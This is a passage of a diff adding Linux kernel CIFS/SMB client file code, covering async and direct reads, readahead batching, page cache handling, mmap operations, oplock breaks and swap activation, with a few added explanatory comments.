++						kref_put(&rdata->refcount,
++							cifs_uncached_readdata_release);
++						continue;
++					}
++				}
++
++				if (ctx->direct_io) {
++					/*
++					 * Re-use rdata as this is
++					 * direct I/O
++					 */
++					rc = cifs_resend_rdata(
++						rdata,
++						&tmp_list, ctx);
++				} else {
++					rc = cifs_send_async_read(
++						rdata->offset + got_bytes,
++						rdata->bytes - got_bytes,
++						rdata->cfile, cifs_sb,
++						&tmp_list, ctx);
++
++					kref_put(&rdata->refcount,
++						cifs_uncached_readdata_release);
++				}
++
++				list_splice(&tmp_list, &ctx->list);
++
++				goto again;
++			} else if (rdata->result)
++				rc = rdata->result;
++			else if (!ctx->direct_io)
++				rc = cifs_readdata_to_iov(rdata, to);
++
++			/* if there was a short read -- discard anything left */
++			if (rdata->got_bytes && rdata->got_bytes < rdata->bytes)
++				rc = -ENODATA;
++
++			ctx->total_len += rdata->got_bytes;
++		}
++		list_del_init(&rdata->list);
++		kref_put(&rdata->refcount, cifs_uncached_readdata_release);
++	}
++
++	if (!ctx->direct_io)
++		ctx->total_len = ctx->len - iov_iter_count(to);
++
++	/* mask nodata case */
++	if (rc == -ENODATA)
++		rc = 0;
++
++	ctx->rc = (rc == 0) ? (ssize_t)ctx->total_len : rc;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (ctx->iocb && ctx->iocb->ki_complete)
++		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
++	else
++		complete(&ctx->done);
++}
++
++static ssize_t __cifs_readv(
++	struct kiocb *iocb, struct iov_iter *to, bool direct)
++{
++	size_t len;
++	struct file *file = iocb->ki_filp;
++	struct cifs_sb_info *cifs_sb;
++	struct cifsFileInfo *cfile;
++	struct cifs_tcon *tcon;
++	ssize_t rc, total_read = 0;
++	loff_t offset = iocb->ki_pos;
++	struct cifs_aio_ctx *ctx;
++
++	/*
++	 * iov_iter_get_pages_alloc() doesn't work with ITER_KVEC,
++	 * so fall back to the data-copy read path.
++	 * This could be improved by getting pages directly in ITER_KVEC.
++	 */
++	if (direct && iov_iter_is_kvec(to)) {
++		cifs_dbg(FYI, "use non-direct cifs_user_readv for kvec I/O\n");
++		direct = false;
++	}
++
++	len = iov_iter_count(to);
++	if (!len)
++		return 0;
++
++	cifs_sb = CIFS_FILE_SB(file);
++	cfile = file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	if (!tcon->ses->server->ops->async_readv)
++		return -ENOSYS;
++
++	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
++		cifs_dbg(FYI, "attempting read on write only file instance\n");
++
++	ctx = cifs_aio_ctx_alloc();
++	if (!ctx)
++		return -ENOMEM;
++
++	ctx->cfile = cifsFileInfo_get(cfile);
++
++	if (!is_sync_kiocb(iocb))
++		ctx->iocb = iocb;
++
++	if (user_backed_iter(to))
++		ctx->should_dirty = true;
++
++	if (direct) {
++		ctx->pos = offset;
++		ctx->direct_io = true;
++		ctx->iter = *to;
++		ctx->len = len;
++	} else {
++		rc = setup_aio_ctx_iter(ctx, to, ITER_DEST);
++		if (rc) {
++			kref_put(&ctx->refcount, cifs_aio_ctx_release);
++			return rc;
++		}
++		len = ctx->len;
++	}
++
++	if (direct) {
++		rc = filemap_write_and_wait_range(file->f_inode->i_mapping,
++						  offset, offset + len - 1);
++		if (rc) {
++			kref_put(&ctx->refcount, cifs_aio_ctx_release);
++			return -EAGAIN;
++		}
++	}
++
++	/* grab a lock here because read response handlers can access ctx */
++	mutex_lock(&ctx->aio_mutex);
++
++	rc = cifs_send_async_read(offset, len, cfile, cifs_sb, &ctx->list, ctx);
++
++	/* if at least one read request was sent successfully, then reset rc */
++	if (!list_empty(&ctx->list))
++		rc = 0;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (rc) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return rc;
++	}
++
++	if (!is_sync_kiocb(iocb)) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return -EIOCBQUEUED;
++	}
++
++	rc = wait_for_completion_killable(&ctx->done);
++	if (rc) {
++		mutex_lock(&ctx->aio_mutex);
++		ctx->rc = rc = -EINTR;
++		total_read = ctx->total_len;
++		mutex_unlock(&ctx->aio_mutex);
++	} else {
++		rc = ctx->rc;
++		total_read = ctx->total_len;
++	}
++
++	kref_put(&ctx->refcount, cifs_aio_ctx_release);
++
++	if (total_read) {
++		iocb->ki_pos += total_read;
++		return total_read;
++	}
++	return rc;
++}
++
++ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to)
++{
++	return __cifs_readv(iocb, to, true);
++}
++
++ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to)
++{
++	return __cifs_readv(iocb, to, false);
++}
++
++ssize_t
++cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
++						iocb->ki_filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	int rc = -EACCES;
++
++	/*
++	 * In strict cache mode we always need to read from the server if we
++	 * don't have a level II oplock, because the server can delay the
++	 * mtime change - so we can't decide whether to invalidate the inode.
++	 * Page reads can also fail if there are mandatory locks on pages
++	 * affected by this read but not on the region from pos to
++	 * pos+len-1.
++	 */
++	if (!CIFS_CACHE_READ(cinode))
++		return cifs_user_readv(iocb, to);
++
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		return generic_file_read_iter(iocb, to);
++
++	/*
++	 * We need to hold the sem to be sure nobody modifies the lock list
++	 * with a brlock that prevents reading.
++	 */
++	down_read(&cinode->lock_sem);
++	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(to),
++				     tcon->ses->server->vals->shared_lock_type,
++				     0, NULL, CIFS_READ_OP))
++		rc = generic_file_read_iter(iocb, to);
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++static ssize_t
++cifs_read(struct file *file, char *read_data, size_t read_size, loff_t *offset)
++{
++	int rc = -EACCES;
++	unsigned int bytes_read = 0;
++	unsigned int total_read;
++	unsigned int current_read_size;
++	unsigned int rsize;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	unsigned int xid;
++	char *cur_offset;
++	struct cifsFileInfo *open_file;
++	struct cifs_io_parms io_parms = {0};
++	int buf_type = CIFS_NO_BUFFER;
++	__u32 pid;
++
++	xid = get_xid();
++	cifs_sb = CIFS_FILE_SB(file);
++
++	/* FIXME: set up handlers for larger reads and/or convert to async */
++	rsize = min_t(unsigned int, cifs_sb->ctx->rsize, CIFSMaxBufSize);
++
++	if (file->private_data == NULL) {
++		rc = -EBADF;
++		free_xid(xid);
++		return rc;
++	}
++	open_file = file->private_data;
++	tcon = tlink_tcon(open_file->tlink);
++	server = cifs_pick_channel(tcon->ses);
++
++	if (!server->ops->sync_read) {
++		free_xid(xid);
++		return -ENOSYS;
++	}
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
++		cifs_dbg(FYI, "attempting read on write only file instance\n");
++
++	for (total_read = 0, cur_offset = read_data; read_size > total_read;
++	     total_read += bytes_read, cur_offset += bytes_read) {
++		do {
++			current_read_size = min_t(uint, read_size - total_read,
++						  rsize);
++			/*
++			 * For Windows ME and 9x we do not want to request
++			 * more than was negotiated, since the server will
++			 * refuse the read otherwise.
++			 */
++			if (!(tcon->ses->capabilities &
++				tcon->ses->server->vals->cap_large_files)) {
++				current_read_size = min_t(uint,
++					current_read_size, CIFSMaxBufSize);
++			}
++			if (open_file->invalidHandle) {
++				rc = cifs_reopen_file(open_file, true);
++				if (rc != 0)
++					break;
++			}
++			io_parms.pid = pid;
++			io_parms.tcon = tcon;
++			io_parms.offset = *offset;
++			io_parms.length = current_read_size;
++			io_parms.server = server;
++			rc = server->ops->sync_read(xid, &open_file->fid, &io_parms,
++						    &bytes_read, &cur_offset,
++						    &buf_type);
++		} while (rc == -EAGAIN);
++
++		if (rc || (bytes_read == 0)) {
++			if (total_read) {
++				break;
++			} else {
++				free_xid(xid);
++				return rc;
++			}
++		} else {
++			cifs_stats_bytes_read(tcon, total_read);
++			*offset += bytes_read;
++		}
++	}
++	free_xid(xid);
++	return total_read;
++}
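++
++/*
++ * Illustrative example: a read_size of 100000 bytes with rsize = 16384
++ * takes DIV_ROUND_UP(100000, 16384) = 7 synchronous sync_read round
++ * trips, assuming each call returns a full chunk; short reads advance
++ * by bytes_read and take more iterations.
++ */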
++
++/*
++ * If the page is mmap'ed into a process' page tables, then we need to make
++ * sure that it doesn't change while being written back.
++ */
++static vm_fault_t
++cifs_page_mkwrite(struct vm_fault *vmf)
++{
++	struct page *page = vmf->page;
++
++	/* Wait for the page to be written to the cache before we allow it to
++	 * be modified.  We then assume the entire page will need writing back.
++	 */
++#ifdef CONFIG_CIFS_FSCACHE
++	if (PageFsCache(page) &&
++	    wait_on_page_fscache_killable(page) < 0)
++		return VM_FAULT_RETRY;
++#endif
++
++	wait_on_page_writeback(page);
++
++	if (lock_page_killable(page) < 0)
++		return VM_FAULT_RETRY;
++	return VM_FAULT_LOCKED;
++}
++
++static const struct vm_operations_struct cifs_file_vm_ops = {
++	.fault = filemap_fault,
++	.map_pages = filemap_map_pages,
++	.page_mkwrite = cifs_page_mkwrite,
++};
++
++int cifs_file_strict_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	int xid, rc = 0;
++	struct inode *inode = file_inode(file);
++
++	xid = get_xid();
++
++	if (!CIFS_CACHE_READ(CIFS_I(inode)))
++		rc = cifs_zap_mapping(inode);
++	if (!rc)
++		rc = generic_file_mmap(file, vma);
++	if (!rc)
++		vma->vm_ops = &cifs_file_vm_ops;
++
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_file_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	int rc, xid;
++
++	xid = get_xid();
++
++	rc = cifs_revalidate_file(file);
++	if (rc)
++		cifs_dbg(FYI, "Validation prior to mmap failed, error=%d\n",
++			 rc);
++	if (!rc)
++		rc = generic_file_mmap(file, vma);
++	if (!rc)
++		vma->vm_ops = &cifs_file_vm_ops;
++
++	free_xid(xid);
++	return rc;
++}
++
++static void
++cifs_readv_complete(struct work_struct *work)
++{
++	unsigned int i, got_bytes;
++	struct cifs_readdata *rdata = container_of(work,
++						struct cifs_readdata, work);
++
++	got_bytes = rdata->got_bytes;
++	for (i = 0; i < rdata->nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++
++		if (rdata->result == 0 ||
++		    (rdata->result == -EAGAIN && got_bytes)) {
++			flush_dcache_page(page);
++			SetPageUptodate(page);
++		} else
++			SetPageError(page);
++
++		if (rdata->result == 0 ||
++		    (rdata->result == -EAGAIN && got_bytes))
++			cifs_readpage_to_fscache(rdata->mapping->host, page);
++
++		unlock_page(page);
++
++		got_bytes -= min_t(unsigned int, PAGE_SIZE, got_bytes);
++
++		put_page(page);
++		rdata->pages[i] = NULL;
++	}
++	kref_put(&rdata->refcount, cifs_readdata_release);
++}
++
++static int
++readpages_fill_pages(struct TCP_Server_Info *server,
++		     struct cifs_readdata *rdata, struct iov_iter *iter,
++		     unsigned int len)
++{
++	int result = 0;
++	unsigned int i;
++	u64 eof;
++	pgoff_t eof_index;
++	unsigned int nr_pages = rdata->nr_pages;
++	unsigned int page_offset = rdata->page_offset;
++
++	/* determine the eof that the server (probably) has */
++	eof = CIFS_I(rdata->mapping->host)->server_eof;
++	eof_index = eof ? (eof - 1) >> PAGE_SHIFT : 0;
++	cifs_dbg(FYI, "eof=%llu eof_index=%lu\n", eof, eof_index);
++
++	rdata->got_bytes = 0;
++	rdata->tailsz = PAGE_SIZE;
++	for (i = 0; i < nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++		unsigned int to_read = rdata->pagesz;
++		size_t n;
++
++		if (i == 0)
++			to_read -= page_offset;
++		else
++			page_offset = 0;
++
++		n = to_read;
++
++		if (len >= to_read) {
++			len -= to_read;
++		} else if (len > 0) {
++			/* enough for partial page, fill and zero the rest */
++			zero_user(page, len + page_offset, to_read - len);
++			n = rdata->tailsz = len;
++			len = 0;
++		} else if (page->index > eof_index) {
++			/*
++			 * The VFS will not try to do readahead past the
++			 * i_size, but it's possible that we have outstanding
++			 * writes with gaps in the middle and the i_size hasn't
++			 * caught up yet. Populate those with zeroed out pages
++			 * to prevent the VFS from repeatedly attempting to
++			 * fill them until the writes are flushed.
++			 */
++			zero_user(page, 0, PAGE_SIZE);
++			flush_dcache_page(page);
++			SetPageUptodate(page);
++			unlock_page(page);
++			put_page(page);
++			rdata->pages[i] = NULL;
++			rdata->nr_pages--;
++			continue;
++		} else {
++			/* no need to hold page hostage */
++			unlock_page(page);
++			put_page(page);
++			rdata->pages[i] = NULL;
++			rdata->nr_pages--;
++			continue;
++		}
++
++		if (iter)
++			result = copy_page_from_iter(
++					page, page_offset, n, iter);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++		else if (rdata->mr)
++			result = n;
++#endif
++		else
++			result = cifs_read_page_from_socket(
++					server, page, page_offset, n);
++		if (result < 0)
++			break;
++
++		rdata->got_bytes += result;
++	}
++
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
++						rdata->got_bytes : result;
++}
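++
++/*
++ * Illustrative example of the eof_index handling above, assuming 4 KiB
++ * pages: for server_eof = 10000, eof_index = (10000 - 1) >> 12 = 2, so
++ * a page with index 3 (file offset 12288) that received no data is
++ * zero-filled and marked up to date instead of being read again.
++ */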
++
++static int
++cifs_readpages_read_into_pages(struct TCP_Server_Info *server,
++			       struct cifs_readdata *rdata, unsigned int len)
++{
++	return readpages_fill_pages(server, rdata, NULL, len);
++}
++
++static int
++cifs_readpages_copy_into_pages(struct TCP_Server_Info *server,
++			       struct cifs_readdata *rdata,
++			       struct iov_iter *iter)
++{
++	return readpages_fill_pages(server, rdata, iter, iter->count);
++}
++
++static void cifs_readahead(struct readahead_control *ractl)
++{
++	int rc;
++	struct cifsFileInfo *open_file = ractl->file->private_data;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(ractl->file);
++	struct TCP_Server_Info *server;
++	pid_t pid;
++	unsigned int xid, nr_pages, last_batch_size = 0, cache_nr_pages = 0;
++	pgoff_t next_cached = ULONG_MAX;
++	bool caching = fscache_cookie_enabled(cifs_inode_cookie(ractl->mapping->host)) &&
++		cifs_inode_cookie(ractl->mapping->host)->cache_priv;
++	bool check_cache = caching;
++
++	xid = get_xid();
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	rc = 0;
++	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
++
++	cifs_dbg(FYI, "%s: file=%p mapping=%p num_pages=%u\n",
++		 __func__, ractl->file, ractl->mapping, readahead_count(ractl));
++
++	/*
++	 * Chop the readahead request up into rsize-sized read requests.
++	 */
++	while ((nr_pages = readahead_count(ractl) - last_batch_size)) {
++		unsigned int i, got, rsize;
++		struct page *page;
++		struct cifs_readdata *rdata;
++		struct cifs_credits credits_on_stack;
++		struct cifs_credits *credits = &credits_on_stack;
++		pgoff_t index = readahead_index(ractl) + last_batch_size;
++
++		/*
++		 * Find out if we have anything cached in the range of
++		 * interest, and if so, where the next chunk of cached data is.
++		 */
++		if (caching) {
++			if (check_cache) {
++				rc = cifs_fscache_query_occupancy(
++					ractl->mapping->host, index, nr_pages,
++					&next_cached, &cache_nr_pages);
++				if (rc < 0)
++					caching = false;
++				check_cache = false;
++			}
++
++			if (index == next_cached) {
++				/*
++				 * TODO: Send a whole batch of pages to be read
++				 * by the cache.
++				 */
++				struct folio *folio = readahead_folio(ractl);
++
++				last_batch_size = folio_nr_pages(folio);
++				if (cifs_readpage_from_fscache(ractl->mapping->host,
++							       &folio->page) < 0) {
++					/*
++					 * TODO: Deal with cache read failure
++					 * here, but for the moment, delegate
++					 * that to readpage.
++					 */
++					caching = false;
++				}
++				folio_unlock(folio);
++				next_cached++;
++				cache_nr_pages--;
++				if (cache_nr_pages == 0)
++					check_cache = true;
++				continue;
++			}
++		}
++
++		if (open_file->invalidHandle) {
++			rc = cifs_reopen_file(open_file, true);
++			if (rc) {
++				if (rc == -EAGAIN)
++					continue;
++				break;
++			}
++		}
++
++		if (cifs_sb->ctx->rsize == 0)
++			cifs_sb->ctx->rsize =
++				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
++							     cifs_sb->ctx);
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
++						   &rsize, credits);
++		if (rc)
++			break;
++		nr_pages = min_t(size_t, rsize / PAGE_SIZE, readahead_count(ractl));
++		nr_pages = min_t(size_t, nr_pages, next_cached - index);
++
++		/*
++		 * Give up immediately if rsize is too small to read an entire
++		 * page. The VFS will fall back to readpage. We should never
++		 * reach this point, however, since we set ra_pages to 0 when
++		 * the rsize is smaller than a cache page.
++		 */
++		if (unlikely(!nr_pages)) {
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		rdata = cifs_readdata_alloc(nr_pages, cifs_readv_complete);
++		if (!rdata) {
++			/* best to give up if we're out of mem */
++			add_credits_and_wake_if(server, credits, 0);
++			break;
++		}
++
++		got = __readahead_batch(ractl, rdata->pages, nr_pages);
++		if (got != nr_pages) {
++			pr_warn("__readahead_batch() returned %u/%u\n",
++				got, nr_pages);
++			nr_pages = got;
++		}
++
++		rdata->nr_pages = nr_pages;
++		rdata->bytes	= readahead_batch_length(ractl);
++		rdata->cfile	= cifsFileInfo_get(open_file);
++		rdata->server	= server;
++		rdata->mapping	= ractl->mapping;
++		rdata->offset	= readahead_pos(ractl);
++		rdata->pid	= pid;
++		rdata->pagesz	= PAGE_SIZE;
++		rdata->tailsz	= PAGE_SIZE;
++		rdata->read_into_pages = cifs_readpages_read_into_pages;
++		rdata->copy_into_pages = cifs_readpages_copy_into_pages;
++		rdata->credits	= credits_on_stack;
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++		if (!rc) {
++			if (rdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else
++				rc = server->ops->async_readv(rdata);
++		}
++
++		if (rc) {
++			add_credits_and_wake_if(server, &rdata->credits, 0);
++			for (i = 0; i < rdata->nr_pages; i++) {
++				page = rdata->pages[i];
++				unlock_page(page);
++				put_page(page);
++			}
++			/* Fallback to the readpage in error/reconnect cases */
++			kref_put(&rdata->refcount, cifs_readdata_release);
++			break;
++		}
++
++		kref_put(&rdata->refcount, cifs_readdata_release);
++		last_batch_size = nr_pages;
++	}
++
++	free_xid(xid);
++}
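++
++/*
++ * Editor's note (illustrative, not part of the original patch): the loop
++ * above chops the readahead window into rsize-sized reads. The batch size
++ * computation reduces to:
++ *
++ *	nr_pages = min(rsize / PAGE_SIZE, readahead_count(ractl));
++ *	nr_pages = min(nr_pages, next_cached - index);
++ *
++ * so with, e.g., a negotiated rsize of 1 MiB and 4 KiB pages, at most 256
++ * pages are submitted per SMB READ request, and a batch never overlaps
++ * the next fscache-resident chunk.
++ */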
++
++/*
++ * cifs_readpage_worker must be called with the page pinned
++ */
++static int cifs_readpage_worker(struct file *file, struct page *page,
++	loff_t *poffset)
++{
++	char *read_data;
++	int rc;
++
++	/* Is the page cached? */
++	rc = cifs_readpage_from_fscache(file_inode(file), page);
++	if (rc == 0)
++		goto read_complete;
++
++	read_data = kmap(page);
++	/* for reads over a certain size we could initiate async read-ahead */
++
++	rc = cifs_read(file, read_data, PAGE_SIZE, poffset);
++
++	if (rc < 0)
++		goto io_error;
++	else
++		cifs_dbg(FYI, "Bytes read %d\n", rc);
++
++	/* we do not want atime to be less than mtime; it broke some apps */
++	file_inode(file)->i_atime = current_time(file_inode(file));
++	if (timespec64_compare(&(file_inode(file)->i_atime), &(file_inode(file)->i_mtime)))
++		file_inode(file)->i_atime = file_inode(file)->i_mtime;
++	else
++		file_inode(file)->i_atime = current_time(file_inode(file));
++
++	if (PAGE_SIZE > rc)
++		memset(read_data + rc, 0, PAGE_SIZE - rc);
++
++	flush_dcache_page(page);
++	SetPageUptodate(page);
++
++	/* send this page to the cache */
++	cifs_readpage_to_fscache(file_inode(file), page);
++
++	rc = 0;
++
++io_error:
++	kunmap(page);
++	unlock_page(page);
++
++read_complete:
++	return rc;
++}
++
++static int cifs_read_folio(struct file *file, struct folio *folio)
++{
++	struct page *page = &folio->page;
++	loff_t offset = page_file_offset(page);
++	int rc = -EACCES;
++	unsigned int xid;
++
++	xid = get_xid();
++
++	if (file->private_data == NULL) {
++		rc = -EBADF;
++		free_xid(xid);
++		return rc;
++	}
++
++	cifs_dbg(FYI, "read_folio %p at offset %d 0x%x\n",
++		 page, (int)offset, (int)offset);
++
++	rc = cifs_readpage_worker(file, page, &offset);
++
++	free_xid(xid);
++	return rc;
++}
++
++static int is_inode_writable(struct cifsInodeInfo *cifs_inode)
++{
++	struct cifsFileInfo *open_file;
++
++	spin_lock(&cifs_inode->open_file_lock);
++	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
++		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
++			spin_unlock(&cifs_inode->open_file_lock);
++			return 1;
++		}
++	}
++	spin_unlock(&cifs_inode->open_file_lock);
++	return 0;
++}
++
++/*
++ * We do not want to update the file size from the server for inodes open
++ * for write, to avoid races with writepage extending the file. In the
++ * future we could consider allowing refreshing the inode only on increases
++ * in the file size, but this is tricky to do without racing with
++ * writebehind page caching in the current Linux kernel design.
++ */
++bool is_size_safe_to_change(struct cifsInodeInfo *cifsInode, __u64 end_of_file)
++{
++	if (!cifsInode)
++		return true;
++
++	if (is_inode_writable(cifsInode)) {
++		/* This inode is open for write at least once */
++		struct cifs_sb_info *cifs_sb;
++
++		cifs_sb = CIFS_SB(cifsInode->netfs.inode.i_sb);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
++			/* since there is no page cache to corrupt on
++			   direct I/O we can change the size safely */
++			return true;
++		}
++
++		if (i_size_read(&cifsInode->netfs.inode) < end_of_file)
++			return true;
++
++		return false;
++	} else
++		return true;
++}
++
++static int cifs_write_begin(struct file *file, struct address_space *mapping,
++			loff_t pos, unsigned len,
++			struct page **pagep, void **fsdata)
++{
++	int oncethru = 0;
++	pgoff_t index = pos >> PAGE_SHIFT;
++	loff_t offset = pos & (PAGE_SIZE - 1);
++	loff_t page_start = pos & PAGE_MASK;
++	loff_t i_size;
++	struct page *page;
++	int rc = 0;
++
++	cifs_dbg(FYI, "write_begin from %lld len %d\n", (long long)pos, len);
++
++start:
++	page = grab_cache_page_write_begin(mapping, index);
++	if (!page) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	if (PageUptodate(page))
++		goto out;
++
++	/*
++	 * If we write a full page it will be up to date, no need to read from
++	 * the server. If the write is short, we'll end up doing a sync write
++	 * instead.
++	 */
++	if (len == PAGE_SIZE)
++		goto out;
++
++	/*
++	 * optimize away the read when we have an oplock, and we're not
++	 * expecting to use any of the data we'd be reading in. That
++	 * is, when the page lies beyond the EOF, or straddles the EOF
++	 * and the write will cover all of the existing data.
++	 */
++	if (CIFS_CACHE_READ(CIFS_I(mapping->host))) {
++		i_size = i_size_read(mapping->host);
++		if (page_start >= i_size ||
++		    (offset == 0 && (pos + len) >= i_size)) {
++			zero_user_segments(page, 0, offset,
++					   offset + len,
++					   PAGE_SIZE);
++			/*
++			 * PageChecked means that the parts of the page
++			 * to which we're not writing are considered up
++			 * to date. Once the data is copied to the
++			 * page, it can be set uptodate.
++			 */
++			SetPageChecked(page);
++			goto out;
++		}
++	}
++
++	if ((file->f_flags & O_ACCMODE) != O_WRONLY && !oncethru) {
++		/*
++		 * might as well read a page, it is fast enough. If we get
++		 * an error, we don't need to return it. cifs_write_end will
++		 * do a sync write instead since PG_uptodate isn't set.
++		 */
++		cifs_readpage_worker(file, page, &page_start);
++		put_page(page);
++		oncethru = 1;
++		goto start;
++	} else {
++		/* we could try using another file handle if there is one,
++		   but how would we lock it to prevent a close of that handle
++		   racing with this read? In any case this will be written
++		   out by write_end so it is fine */
++	}
++out:
++	*pagep = page;
++	return rc;
++}
++
++static bool cifs_release_folio(struct folio *folio, gfp_t gfp)
++{
++	if (folio_test_private(folio))
++		return false;
++	if (folio_test_fscache(folio)) {
++		if (current_is_kswapd() || !(gfp & __GFP_FS))
++			return false;
++		folio_wait_fscache(folio);
++	}
++	fscache_note_page_release(cifs_inode_cookie(folio->mapping->host));
++	return true;
++}
++
++static void cifs_invalidate_folio(struct folio *folio, size_t offset,
++				 size_t length)
++{
++	folio_wait_fscache(folio);
++}
++
++static int cifs_launder_folio(struct folio *folio)
++{
++	int rc = 0;
++	loff_t range_start = folio_pos(folio);
++	loff_t range_end = range_start + folio_size(folio);
++	struct writeback_control wbc = {
++		.sync_mode = WB_SYNC_ALL,
++		.nr_to_write = 0,
++		.range_start = range_start,
++		.range_end = range_end,
++	};
++
++	cifs_dbg(FYI, "Launder page: %lu\n", folio->index);
++
++	if (folio_clear_dirty_for_io(folio))
++		rc = cifs_writepage_locked(&folio->page, &wbc);
++
++	folio_wait_fscache(folio);
++	return rc;
++}
++
++void cifs_oplock_break(struct work_struct *work)
++{
++	struct cifsFileInfo *cfile = container_of(work, struct cifsFileInfo,
++						  oplock_break);
++	struct inode *inode = d_inode(cfile->dentry);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	int rc = 0;
++	bool purge_cache = false, oplock_break_cancelled;
++	__u64 persistent_fid, volatile_fid;
++	__u16 net_fid;
++
++	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
++			TASK_UNINTERRUPTIBLE);
++
++	server->ops->downgrade_oplock(server, cinode, cfile->oplock_level,
++				      cfile->oplock_epoch, &purge_cache);
++
++	if (!CIFS_CACHE_WRITE(cinode) && CIFS_CACHE_READ(cinode) &&
++						cifs_has_mand_locks(cinode)) {
++		cifs_dbg(FYI, "Reset oplock to None for inode=%p due to mand locks\n",
++			 inode);
++		cinode->oplock = 0;
++	}
++
++	if (inode && S_ISREG(inode->i_mode)) {
++		if (CIFS_CACHE_READ(cinode))
++			break_lease(inode, O_RDONLY);
++		else
++			break_lease(inode, O_WRONLY);
++		rc = filemap_fdatawrite(inode->i_mapping);
++		if (!CIFS_CACHE_READ(cinode) || purge_cache) {
++			rc = filemap_fdatawait(inode->i_mapping);
++			mapping_set_error(inode->i_mapping, rc);
++			cifs_zap_mapping(inode);
++		}
++		cifs_dbg(FYI, "Oplock flush inode %p rc %d\n", inode, rc);
++		if (CIFS_CACHE_WRITE(cinode))
++			goto oplock_break_ack;
++	}
++
++	rc = cifs_push_locks(cfile);
++	if (rc)
++		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
++
++oplock_break_ack:
++	/*
++	 * When an oplock break is received and there are no active file
++	 * handles, only cached ones, schedule the deferred close immediately
++	 * so that a new open will not use a cached handle.
++	 */
++
++	if (!CIFS_CACHE_HANDLE(cinode) && !list_empty(&cinode->deferred_closes))
++		cifs_close_deferred_file(cinode);
++
++	persistent_fid = cfile->fid.persistent_fid;
++	volatile_fid = cfile->fid.volatile_fid;
++	net_fid = cfile->fid.netfid;
++	oplock_break_cancelled = cfile->oplock_break_cancelled;
++
++	_cifsFileInfo_put(cfile, false /* do not wait for ourselves */, false);
++	/*
++	 * Releasing a stale oplock after a recent reconnect of the SMB
++	 * session using a now-incorrect file handle is not a data integrity
++	 * issue, but do not bother sending an oplock release if the session
++	 * to the server is still disconnected, since the oplock has already
++	 * been released by the server.
++	 */
++	if (!oplock_break_cancelled) {
++		/* check for a null server since this can race with kill_sb calling tree disconnect */
++		if (tcon->ses && tcon->ses->server) {
++			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++				volatile_fid, net_fid, cinode);
++			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++		} else
++			pr_warn_once("lease break not sent for unmounted share\n");
++	}
++
++	cifs_done_oplock_break(cinode);
++}
++
++/*
++ * The presence of cifs_direct_io() in the address space ops vector
++ * allows open() O_DIRECT flags which would have failed otherwise.
++ *
++ * In the non-cached mode (mount with cache=none), we shunt off direct read and write requests
++ * so this method should never be called.
++ *
++ * Direct IO is not yet supported in the cached mode.
++ */
++static ssize_t
++cifs_direct_io(struct kiocb *iocb, struct iov_iter *iter)
++{
++	/*
++	 * FIXME
++	 * Eventually need to support direct IO for non-forcedirectio mounts
++	 */
++	return -EINVAL;
++}
++
++static int cifs_swap_activate(struct swap_info_struct *sis,
++			      struct file *swap_file, sector_t *span)
++{
++	struct cifsFileInfo *cfile = swap_file->private_data;
++	struct inode *inode = swap_file->f_mapping->host;
++	unsigned long blocks;
++	long long isize;
++
++	cifs_dbg(FYI, "swap activate\n");
++
++	if (!swap_file->f_mapping->a_ops->swap_rw)
++		/* Cannot support swap */
++		return -EINVAL;
++
++	spin_lock(&inode->i_lock);
++	blocks = inode->i_blocks;
++	isize = inode->i_size;
++	spin_unlock(&inode->i_lock);
++	if (blocks*512 < isize) {
++		pr_warn("swap activate: swapfile has holes\n");
++		return -EINVAL;
++	}
++	*span = sis->pages;
++
